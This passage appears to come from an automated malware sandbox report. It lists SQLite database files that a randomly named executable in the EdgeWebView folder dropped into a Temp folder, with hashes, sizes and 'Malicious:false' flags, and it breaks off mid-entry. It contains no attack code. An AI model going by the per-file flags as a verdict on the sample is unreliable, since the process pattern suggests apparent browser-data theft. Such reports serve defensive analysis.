                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qBw2kUBHPT

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qFKMp5s4ne

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qSQ6vxyw4f

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\r7I42ZJTih

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\rIuaqdHyuw

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\rSp3QwYRcR

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\rspGcNG4OM

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\rwAukXeb4t

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\s9sBhd2A8Q

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\sC6d0vFjaw

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\sZKWHr8mhB

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\stwyTF4RKV

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\tJGyP21rCo

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\tNJIOXLW7w

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\tcxvQq0FSj

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\tslST7oOG2

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\uFhP794vph

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\usNvtKVTX6

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\v0nxf9wvOJ

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\vPN7k71zOo

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\xQ0K6Si2mk

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
